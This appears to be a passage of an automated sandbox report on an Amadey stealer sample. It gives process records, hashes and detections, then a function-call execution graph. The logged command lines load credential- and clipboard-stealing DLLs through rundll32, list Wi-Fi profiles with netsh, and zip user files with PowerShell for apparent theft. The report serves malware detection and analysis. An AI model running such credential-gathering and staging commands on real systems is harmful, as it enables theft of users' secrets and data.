                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:20:02:30
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            Imagebase:0x2a0000
                                                                                            File size:1'906'688 bytes
                                                                                            MD5 hash:79FBD35CAE4148D9053CD4590B6D41C0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1694112022.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1653832811.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 71%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:20:03:00
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            Imagebase:0x2a0000
                                                                                            File size:1'906'688 bytes
                                                                                            MD5 hash:79FBD35CAE4148D9053CD4590B6D41C0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.1944154808.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:20:03:04
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                            Imagebase:0x6a0000
                                                                                            File size:61'440 bytes
                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:20:03:04
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                            Imagebase:0x7ff70c1d0000
                                                                                            File size:71'680 bytes
                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:20:03:04
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:netsh wlan show profiles
                                                                                            Imagebase:0x400000
                                                                                            File size:96'768 bytes
                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:20:03:05
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:20:03:06
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                            Imagebase:0x6a0000
                                                                                            File size:61'440 bytes
                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:20:03:06
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:20:03:06
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:4.9%
                                                                                              Total number of Nodes:907
                                                                                              Total number of Limit Nodes:37
                                                                                              execution_graph 11554 516371 11555 516389 11554->11555 11557 51637f 11554->11557 11561 5162ba 11555->11561 11558 5163a3 11564 51621a 11558->11564 11560 5163b0 __freea 11562 516237 __fassign 4 API calls 11561->11562 11563 5162cc 11562->11563 11563->11558 11567 516168 11564->11567 11566 516232 11566->11560 11568 516190 11567->11568 11573 516176 __dosmaperr __fassign 11567->11573 11569 516197 11568->11569 11571 5161b6 __fassign 11568->11571 11569->11573 11574 516313 11569->11574 11572 516313 RtlAllocateHeap 11571->11572 11571->11573 11572->11573 11573->11566 11575 516321 11574->11575 11578 516352 11575->11578 11579 51a2bb __fassign RtlAllocateHeap 11578->11579 11580 516332 11579->11580 11580->11573 11226 4e7540 11227 4e7548 GetFileAttributesA 11226->11227 11228 4e7546 11226->11228 11229 4e7554 11227->11229 11228->11227 11304 4e7c40 11305 4e7c8f 11304->11305 11314 4f7360 11305->11314 11307 4e7c9f 11325 4e5190 11307->11325 11309 4e7caa 11332 4f7a20 11309->11332 11311 4e7cfc 11345 4f7b80 11311->11345 11313 4e7d0e shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11315 4f7386 11314->11315 11316 4f738d 11315->11316 11317 4f73c2 11315->11317 11318 4f73e1 11315->11318 11316->11307 11319 4f7419 11317->11319 11320 4f73c9 11317->11320 11321 4fcd47 RtlAllocateHeap 11318->11321 11324 4f73cf __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 11318->11324 11361 4e2360 11319->11361 11353 4fcd47 11320->11353 11321->11324 11324->11307 11373 4e4ec0 11325->11373 11329 4e51ea 11392 4e4ab0 11329->11392 11331 4e520d shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11331->11309 11334 4f7a64 11332->11334 11335 4f7a3e 11332->11335 11333 4f8bd0 RtlAllocateHeap 11336 4f7b53 11333->11336 11337 4f7add 11334->11337 11338 4f7ab8 11334->11338 11343 4f7ac9 11334->11343 11335->11311 11339 4e2360 RtlAllocateHeap 11336->11339 11342 4fcd47 RtlAllocateHeap 11337->11342 11337->11343 11338->11336 11341 4fcd47 RtlAllocateHeap 11338->11341 11340 4f7b58 11339->11340 11341->11343 11342->11343 11343->11333 11344 4f7b30 shared_ptr 11343->11344 11344->11311 11346 4f7ba8 11345->11346 11347 4f7bf2 11345->11347 11346->11347 11348 4f7bb1 11346->11348 11349 4f7c01 11347->11349 11444 4f88a0 11347->11444 11439 4f8be0 11348->11439 11349->11313 11352 4f7bba 11352->11313 11355 4fcd4c __fassign 11353->11355 11356 4fcd66 11355->11356 11357 4e2360 std::_Throw_future_error 11355->11357 11369 5183de 11355->11369 11356->11324 11360 4fcd72 std::_Throw_future_error 11357->11360 11365 51320c 11357->11365 11359 4e23a3 11359->11324 11360->11324 11362 4e236e std::_Throw_future_error 11361->11362 11363 51320c ___std_exception_copy RtlAllocateHeap 11362->11363 11364 4e23a3 11363->11364 11364->11324 11366 513219 11365->11366 11368 513236 ___std_exception_destroy ___std_exception_copy 11365->11368 11367 5183de ___std_exception_copy RtlAllocateHeap 11366->11367 11366->11368 11367->11368 11368->11359 11371 51a2bb __fassign 11369->11371 11370 51a2e4 RtlAllocateHeap 11370->11371 11372 51a2f7 __dosmaperr 11370->11372 11371->11370 11371->11372 11372->11355 11399 4f78e0 11373->11399 11375 4e4eeb 11376 4e4f60 11375->11376 11377 4f78e0 RtlAllocateHeap 11376->11377 11390 4e4fc5 11377->11390 11378 4f7360 RtlAllocateHeap 11378->11390 11379 4e515d __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11379->11329 11380 4e5189 11430 4f7b60 11380->11430 11383 4f7a20 RtlAllocateHeap 11383->11390 11384 4e4ec0 RtlAllocateHeap 11386 4e51d4 11384->11386 11387 4e4f60 RtlAllocateHeap 11386->11387 11388 4e51ea 11387->11388 11389 4e4ab0 RtlAllocateHeap 11388->11389 11391 4e520d shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11389->11391 11390->11378 11390->11379 11390->11380 11390->11383 11424 4e4cb0 11390->11424 11391->11329 11393 4e4ae1 11392->11393 11395 4e4b0b 11392->11395 11394 4f7a20 RtlAllocateHeap 11393->11394 11396 4e4af8 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11394->11396 11397 4f78e0 RtlAllocateHeap 11395->11397 11396->11331 11398 4e4b81 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11397->11398 11398->11331 11400 4f7927 11399->11400 11403 4f78fe __cftof 11399->11403 11405 4f799e 11400->11405 11406 4f797b 11400->11406 11410 4f798c __cftof 11400->11410 11402 4f7a18 11404 4e2360 RtlAllocateHeap 11402->11404 11403->11375 11407 4f7a1d 11404->11407 11408 4fcd47 RtlAllocateHeap 11405->11408 11405->11410 11406->11402 11409 4fcd47 RtlAllocateHeap 11406->11409 11408->11410 11409->11410 11411 4f79f5 shared_ptr 11410->11411 11412 4f8bd0 11410->11412 11411->11375 11415 4fbb19 11412->11415 11418 4fba83 11415->11418 11417 4fbb2a std::_Throw_future_error 11421 4e21c0 11418->11421 11420 4fba95 11420->11417 11422 51320c ___std_exception_copy RtlAllocateHeap 11421->11422 11423 4e21f7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11422->11423 11423->11420 11428 4e4de0 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11424->11428 11429 4e4d19 shared_ptr 11424->11429 11425 4e4eaa 11426 4f7b60 RtlAllocateHeap 11425->11426 11426->11428 11427 4f7a20 RtlAllocateHeap 11427->11429 11428->11390 11429->11425 11429->11427 11429->11428 11433 4fbb39 11430->11433 11432 4e518e 11432->11384 11436 4fbabd 11433->11436 11435 4fbb4a std::_Throw_future_error 11435->11432 11437 4e21c0 std::invalid_argument::invalid_argument RtlAllocateHeap 11436->11437 11438 4fbacf 11437->11438 11438->11435 11440 4f8bf4 11439->11440 11443 4f8c05 11440->11443 11462 4f8e40 11440->11462 11442 4f8c8b 11442->11352 11443->11352 11445 4f89ee 11444->11445 11447 4f88cb 11444->11447 11446 4f8bd0 RtlAllocateHeap 11445->11446 11448 4f89f3 11446->11448 11450 4f893c 11447->11450 11451 4f8912 11447->11451 11449 4e2360 RtlAllocateHeap 11448->11449 11455 4f8923 11449->11455 11454 4fcd47 RtlAllocateHeap 11450->11454 11450->11455 11451->11448 11452 4f891d 11451->11452 11453 4fcd47 RtlAllocateHeap 11452->11453 11453->11455 11454->11455 11456 4f8a18 11455->11456 11458 4f89ac shared_ptr 11455->11458 11459 4e2360 std::_Throw_future_error 11455->11459 11457 4fcd47 RtlAllocateHeap 11456->11457 11457->11458 11458->11349 11460 51320c ___std_exception_copy RtlAllocateHeap 11459->11460 11461 4e23a3 11460->11461 11461->11349 11463 4f8e6b 11462->11463 11464 4f8f79 11462->11464 11468 4f8ed9 11463->11468 11469 4f8eb2 11463->11469 11465 4f8bd0 RtlAllocateHeap 11464->11465 11466 4f8f7e 11465->11466 11467 4e2360 RtlAllocateHeap 11466->11467 11473 4f8ec3 shared_ptr 11467->11473 11472 4fcd47 RtlAllocateHeap 11468->11472 11468->11473 11469->11466 11470 4f8ebd 11469->11470 11471 4fcd47 RtlAllocateHeap 11470->11471 11471->11473 11472->11473 11473->11442 11474 4ea940 11476 4ead38 11474->11476 11475 4f7a20 RtlAllocateHeap 11475->11476 11476->11475 11477 4eae19 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11476->11477 11478 4e7f40 11479 4e7f75 11478->11479 11480 4f7a20 RtlAllocateHeap 11479->11480 11481 4e7fa8 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11480->11481 11581 4eae60 11582 4eaea3 11581->11582 11586 4eb1d8 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11581->11586 11583 4f7360 RtlAllocateHeap 11582->11583 11582->11586 11584 4eaebc 11583->11584 11585 4e5190 RtlAllocateHeap 11584->11585 11587 4eaec4 11585->11587 11588 4f7a20 RtlAllocateHeap 11587->11588 11589 4eaf07 11588->11589 11590 4f7360 RtlAllocateHeap 11589->11590 11591 4eaf53 11590->11591 11592 4e5190 RtlAllocateHeap 11591->11592 11593 4eaf5b 11592->11593 11594 4f7a20 RtlAllocateHeap 11593->11594 11595 4eafa4 shared_ptr 11594->11595 11596 4f7360 RtlAllocateHeap 11595->11596 11602 4eb12b shared_ptr 11595->11602 11597 4eb112 11596->11597 11598 4e5190 RtlAllocateHeap 11597->11598 11600 4eb11a 11598->11600 11599 5160e4 4 API calls 11599->11586 11603 4f7c80 11600->11603 11602->11599 11604 4f7c99 11603->11604 11605 4f7cad 11604->11605 11606 4f88a0 RtlAllocateHeap 11604->11606 11605->11602 11606->11605 12225 4e78c0 12226 4e790c 12225->12226 12227 4f7360 RtlAllocateHeap 12226->12227 12228 4e791c 12227->12228 12229 4e5190 RtlAllocateHeap 12228->12229 12230 4e7927 12229->12230 12231 4f7a20 RtlAllocateHeap 12230->12231 12232 4e7973 12231->12232 12233 4f7a20 RtlAllocateHeap 12232->12233 12234 4e79c5 12233->12234 12235 4f7b80 RtlAllocateHeap 12234->12235 12236 4e79d7 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12235->12236 12237 4e7ac0 12238 4e7b10 12237->12238 12239 4f7360 RtlAllocateHeap 12238->12239 12240 4e7b1f 12239->12240 12241 4e5190 RtlAllocateHeap 12240->12241 12242 4e7b2a 12241->12242 12243 4f7a20 RtlAllocateHeap 12242->12243 12244 4e7b7c 12243->12244 12245 4f7b80 RtlAllocateHeap 12244->12245 12246 4e7b8e shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12245->12246 12247 4ea4e0 12250 4f7e70 12247->12250 12249 4ea536 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12251 4f7ebf 12250->12251 12252 4f7ecc 12250->12252 12256 4f9660 12251->12256 12254 4f7f24 12252->12254 12268 4f99c0 12252->12268 12254->12249 12257 4f9791 12256->12257 12260 4f9685 12256->12260 12258 4f8bd0 RtlAllocateHeap 12257->12258 12267 4f96eb shared_ptr 12258->12267 12259 4f978c 12263 4e2360 RtlAllocateHeap 12259->12263 12260->12259 12261 4f96da 12260->12261 12262 4f9701 12260->12262 12261->12259 12264 4f96e5 12261->12264 12266 4fcd47 RtlAllocateHeap 12262->12266 12262->12267 12263->12257 12265 4fcd47 RtlAllocateHeap 12264->12265 12265->12267 12266->12267 12267->12252 12269 4f9b11 12268->12269 12272 4f99e3 12268->12272 12270 4f8bd0 RtlAllocateHeap 12269->12270 12279 4f9a44 shared_ptr 12270->12279 12271 4f9b0c 12275 4e2360 RtlAllocateHeap 12271->12275 12272->12271 12273 4f9a5d 12272->12273 12274 4f9a33 12272->12274 12278 4fcd47 RtlAllocateHeap 12273->12278 12273->12279 12274->12271 12276 4f9a3e 12274->12276 12275->12269 12277 4fcd47 RtlAllocateHeap 12276->12277 12277->12279 12278->12279 12279->12252 11482 4f8d40 11483 4f8d93 11482->11483 11484 4f8d55 11482->11484 11490 4fca76 11484->11490 11492 4fca87 11490->11492 11491 4f8d5f 11491->11483 11494 4fcfb3 11491->11494 11492->11491 11501 4fcafe 11492->11501 11505 4fcf86 11494->11505 11497 4fca2c 11499 4fca3b 11497->11499 11498 4fcae4 11498->11483 11499->11498 11500 4fcae0 RtlWakeAllConditionVariable 11499->11500 11500->11483 11502 4fcb0c SleepConditionVariableCS 11501->11502 11504 4fcb25 11501->11504 11502->11504 11504->11492 11506 4fcf9c 11505->11506 11507 4fcf95 11505->11507 11514 5190f5 11506->11514 11511 519089 11507->11511 11510 4f8d89 11510->11497 11512 5190f5 RtlAllocateHeap 11511->11512 11513 51909b 11512->11513 11513->11510 11517 518e2b 11514->11517 11516 519126 11516->11510 11518 518e37 __fassign 11517->11518 11521 518e86 11518->11521 11520 518e52 11520->11516 11522 518ea2 11521->11522 11526 518f0f __fassign __freea 11521->11526 11525 518eef __freea 11522->11525 11522->11526 11527 51e5b7 11522->11527 11524 51e5b7 RtlAllocateHeap 11524->11526 11525->11524 11525->11526 11526->11520 11528 51e5c4 11527->11528 11530 51e5d0 __cftof __dosmaperr 11528->11530 11531 5247cf 11528->11531 11530->11525 11532 5247dc 11531->11532 11534 5247e4 __dosmaperr __fassign __freea 11531->11534 11535 51a2bb 11532->11535 11534->11530 11537 51a2f7 __dosmaperr 11535->11537 11538 51a2c9 __fassign 11535->11538 11536 51a2e4 RtlAllocateHeap 11536->11537 11536->11538 11537->11534 11538->11536 11538->11537 11539 4f8240 11540 4f8427 11539->11540 11542 4f8296 11539->11542 11551 4f8b40 11540->11551 11543 4f8422 11542->11543 11544 4f82dc 11542->11544 11547 4f8303 11542->11547 11545 4e2360 RtlAllocateHeap 11543->11545 11544->11543 11546 4f82e7 11544->11546 11545->11540 11548 4fcd47 RtlAllocateHeap 11546->11548 11549 4fcd47 RtlAllocateHeap 11547->11549 11550 4f82ed shared_ptr 11547->11550 11548->11550 11549->11550 11552 4fbb19 RtlAllocateHeap 11551->11552 11553 4f8b4a 11552->11553 11823 4f7d20 11831 4f7040 11823->11831 11825 4f7d99 11826 4f88a0 RtlAllocateHeap 11825->11826 11827 4f7db4 11825->11827 11826->11827 11828 4f88a0 RtlAllocateHeap 11827->11828 11830 4f7e08 11827->11830 11829 4f7e4e 11828->11829 11832 4f705b 11831->11832 11842 4f7144 shared_ptr 11831->11842 11835 4f70ca 11832->11835 11836 4f70f1 11832->11836 11841 4f70db 11832->11841 11832->11842 11833 4f8bd0 RtlAllocateHeap 11834 4f71d6 11833->11834 11837 4e2360 RtlAllocateHeap 11834->11837 11835->11834 11839 4fcd47 RtlAllocateHeap 11835->11839 11840 4fcd47 RtlAllocateHeap 11836->11840 11836->11841 11838 4f71db 11837->11838 11839->11841 11840->11841 11841->11833 11841->11842 11842->11825 11843 4f7320 11844 4f7340 11843->11844 11844->11844 11845 4f7a20 RtlAllocateHeap 11844->11845 11846 4f7352 11845->11846 11210 515f89 11213 515e27 11210->11213 11216 515e35 __fassign 11213->11216 11214 515e80 11216->11214 11218 515e8b 11216->11218 11217 515e8a 11224 519b02 GetPEB 11218->11224 11220 515e95 11221 515eaa __fassign 11220->11221 11222 515e9a GetPEB 11220->11222 11223 515ec2 ExitProcess 11221->11223 11222->11221 11225 519b1c __fassign 11224->11225 11225->11220 11230 4e7510 11231 4e7516 11230->11231 11232 4e7536 11231->11232 11235 5160e4 11231->11235 11234 4e7530 11236 5160f0 __fassign 11235->11236 11238 5160fa __cftof __dosmaperr 11236->11238 11239 51606d 11236->11239 11238->11234 11240 51608f 11239->11240 11242 51607a __cftof __dosmaperr __freea 11239->11242 11240->11242 11243 519833 11240->11243 11242->11238 11244 519870 11243->11244 11245 51984b 11243->11245 11244->11242 11245->11244 11247 51fbf9 11245->11247 11248 51fc05 __fassign 11247->11248 11250 51fc0d __cftof __dosmaperr 11248->11250 11251 51fceb 11248->11251 11250->11244 11252 51fd11 __cftof __dosmaperr 11251->11252 11253 51fd0d 11251->11253 11252->11250 11253->11252 11255 51f480 11253->11255 11256 51f4cd 11255->11256 11262 516237 11256->11262 11259 51bdeb GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 11261 51f4dc __cftof 11259->11261 11260 51f77c __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11260->11252 11261->11259 11261->11260 11268 51cbea 11261->11268 11263 516257 11262->11263 11264 51624e 11262->11264 11263->11264 11272 51adbc 11263->11272 11264->11261 11269 51cbf5 11268->11269 11270 51adbc __fassign 3 API calls 11269->11270 11271 51cc05 11270->11271 11271->11261 11273 51adcf 11272->11273 11275 51628d 11272->11275 11273->11275 11280 51ed6c 11273->11280 11276 51ade9 11275->11276 11277 51ae11 11276->11277 11278 51adfc 11276->11278 11277->11264 11278->11277 11291 51de72 11278->11291 11282 51ed78 __fassign 11280->11282 11281 51edc7 11281->11275 11282->11281 11285 5183e9 11282->11285 11284 51edec 11286 5183ee __fassign 11285->11286 11287 51cdf5 __fassign GetPEB ExitProcess GetPEB 11286->11287 11289 5183f9 __cftof 11286->11289 11287->11289 11288 515f4d __fassign GetPEB ExitProcess GetPEB 11290 51842c __dosmaperr __fassign 11288->11290 11289->11288 11290->11284 11292 51de7c 11291->11292 11295 51dd8a 11292->11295 11294 51de82 11294->11277 11299 51dd96 __fassign __freea 11295->11299 11296 51ddb7 11296->11294 11297 5183e9 __fassign GetPEB ExitProcess GetPEB 11298 51de29 11297->11298 11300 51de65 11298->11300 11301 51a780 __fassign GetPEB ExitProcess GetPEB 11298->11301 11299->11296 11299->11297 11300->11294 11302 51de56 11301->11302 11303 51dc71 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11302->11303 11303->11300 11607 4e5470 11609 4e54a8 shared_ptr 11607->11609 11608 4e558e shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11609->11608 11610 4f7360 RtlAllocateHeap 11609->11610 11611 4e5676 11610->11611 11612 4e5190 RtlAllocateHeap 11611->11612 11613 4e5681 11612->11613 11638 4e21a0 11613->11638 11615 4e5699 shared_ptr 11616 4f7360 RtlAllocateHeap 11615->11616 11636 4e58b3 shared_ptr 11615->11636 11617 4e5702 11616->11617 11618 4e5190 RtlAllocateHeap 11617->11618 11619 4e570d 11618->11619 11620 4e21a0 4 API calls 11619->11620 11637 4e5727 shared_ptr 11620->11637 11621 4e5c71 11622 4e5c94 11621->11622 11623 4e5d33 11621->11623 11624 4f7a20 RtlAllocateHeap 11622->11624 11625 4f7b60 RtlAllocateHeap 11623->11625 11633 4e58df shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11624->11633 11625->11633 11626 4f7a20 RtlAllocateHeap 11626->11636 11627 4e5822 11628 4f7a20 RtlAllocateHeap 11627->11628 11630 4e586c 11628->11630 11629 4f7360 RtlAllocateHeap 11629->11637 11631 4f7a20 RtlAllocateHeap 11630->11631 11631->11636 11632 4e5190 RtlAllocateHeap 11632->11637 11634 4f8be0 RtlAllocateHeap 11634->11636 11635 4e21a0 4 API calls 11635->11637 11636->11621 11636->11623 11636->11626 11636->11633 11636->11634 11637->11627 11637->11629 11637->11632 11637->11635 11637->11636 11641 4e2160 11638->11641 11642 4e2176 11641->11642 11645 518064 11642->11645 11648 516e53 11645->11648 11647 4e2184 11647->11615 11649 516e93 11648->11649 11650 516e7b __cftof __dosmaperr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11648->11650 11649->11650 11651 516237 __fassign 4 API calls 11649->11651 11650->11647 11652 516eab 11651->11652 11654 51740e 11652->11654 11655 51741f 11654->11655 11656 51742e __cftof __dosmaperr 11655->11656 11661 5179b2 11655->11661 11666 51760c 11655->11666 11671 517632 11655->11671 11692 517780 11655->11692 11656->11650 11662 5179c2 11661->11662 11663 5179bb 11661->11663 11662->11655 11711 51739a 11663->11711 11665 5179c1 11665->11655 11667 517615 11666->11667 11668 51761c 11666->11668 11669 51739a 4 API calls 11667->11669 11668->11655 11670 51761b 11669->11670 11670->11655 11672 517639 11671->11672 11675 517653 __cftof __dosmaperr 11671->11675 11673 517805 11672->11673 11674 517799 11672->11674 11672->11675 11676 51784b 11673->11676 11677 51780c 11673->11677 11684 5177dc 11673->11684 11680 5177a5 11674->11680 11674->11684 11675->11655 11749 517e4e 11676->11749 11679 517811 11677->11679 11686 5177b3 11677->11686 11679->11684 11685 517816 11679->11685 11683 5177ec 11680->11683 11680->11686 11690 5177c1 11680->11690 11691 5177d5 11683->11691 11731 517bda 11683->11731 11684->11690 11684->11691 11739 517c6a 11684->11739 11685->11690 11685->11691 11735 517e2f 11685->11735 11686->11690 11686->11691 11743 517a8b 11686->11743 11690->11691 11752 517f34 11690->11752 11691->11655 11693 517805 11692->11693 11694 517799 11692->11694 11695 51784b 11693->11695 11696 51780c 11693->11696 11698 5177dc 11693->11698 11694->11698 11702 5177a5 11694->11702 11697 517e4e RtlAllocateHeap 11695->11697 11699 517811 11696->11699 11700 5177b3 11696->11700 11709 5177c1 11697->11709 11703 517c6a RtlAllocateHeap 11698->11703 11698->11709 11710 5177d5 11698->11710 11699->11698 11705 517816 11699->11705 11704 517a8b 4 API calls 11700->11704 11700->11709 11700->11710 11701 5177ec 11706 517bda 4 API calls 11701->11706 11701->11710 11702->11700 11702->11701 11702->11709 11703->11709 11704->11709 11707 517e2f RtlAllocateHeap 11705->11707 11705->11709 11705->11710 11706->11709 11707->11709 11708 517f34 4 API calls 11708->11710 11709->11708 11709->11710 11710->11655 11712 5173ac __dosmaperr 11711->11712 11715 518376 11712->11715 11714 5173cf __dosmaperr 11714->11665 11716 518391 11715->11716 11719 5180d4 11716->11719 11718 51839b 11718->11714 11720 5180e6 11719->11720 11721 516237 __fassign 4 API calls 11720->11721 11724 5180fb __cftof __dosmaperr 11720->11724 11723 51812b 11721->11723 11723->11724 11725 518322 11723->11725 11724->11718 11726 51835f 11725->11726 11728 51832f 11725->11728 11727 51cbea GetPEB ExitProcess GetPEB 11726->11727 11729 51833e __fassign 11727->11729 11728->11729 11730 51cc0e GetPEB ExitProcess GetPEB RtlAllocateHeap 11728->11730 11729->11723 11730->11729 11733 517bf5 11731->11733 11732 517c27 11732->11690 11733->11732 11756 51bf60 11733->11756 11736 517e3b 11735->11736 11737 517c6a RtlAllocateHeap 11736->11737 11738 517e4d 11737->11738 11738->11690 11740 517c7d 11739->11740 11742 517c98 __cftof __dosmaperr 11740->11742 11763 516fe9 11740->11763 11742->11690 11744 517aa4 11743->11744 11745 516fe9 RtlAllocateHeap 11744->11745 11746 517ae1 11745->11746 11767 51ca9a 11746->11767 11748 517b57 11748->11690 11748->11748 11750 517c6a RtlAllocateHeap 11749->11750 11751 517e65 11750->11751 11751->11690 11753 517fa7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11752->11753 11755 517f51 11752->11755 11753->11691 11754 51bf60 __cftof 4 API calls 11754->11755 11755->11753 11755->11754 11759 51be05 11756->11759 11758 51bf78 11758->11732 11761 51be15 11759->11761 11760 51be1a __cftof __dosmaperr 